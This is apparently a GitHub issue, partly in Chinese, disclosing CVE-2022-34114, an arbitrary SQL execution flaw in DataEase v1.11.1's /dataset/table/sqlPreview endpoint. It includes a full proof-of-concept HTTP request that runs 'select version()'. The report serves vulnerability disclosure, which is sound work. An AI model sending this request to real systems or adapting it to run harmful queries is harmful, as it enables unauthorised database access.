Headline
CVE-2022-34114: [Bug]任意SQL代码执行 · Issue #2430 · dataease/dataease
Dataease v1.11.1 was discovered to contain a SQL injection vulnerability via the parameter dataSourceId.
Bug 重现步骤(有截图更好)
普通权限用户可调用 /dataset/table/sqlPreview 接口。
实现过程中主要需要两个参数:DataSourceId和 sql,dataSourceId可通过查看数据源获取。
POST /dataset/table/sqlPreview HTTP/1.1
Host: xxx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN
Accept-Encoding: gzip, deflate
Content-Type: application/json
Authorization: xxx
LINK-PWD-TOKEN: null
Content-Length: 95
Connection: close
{"dataSourceId":"76026997-94f9-4a35-96ca-151084638969","info":"{\"sql\":\"select version()\"}"}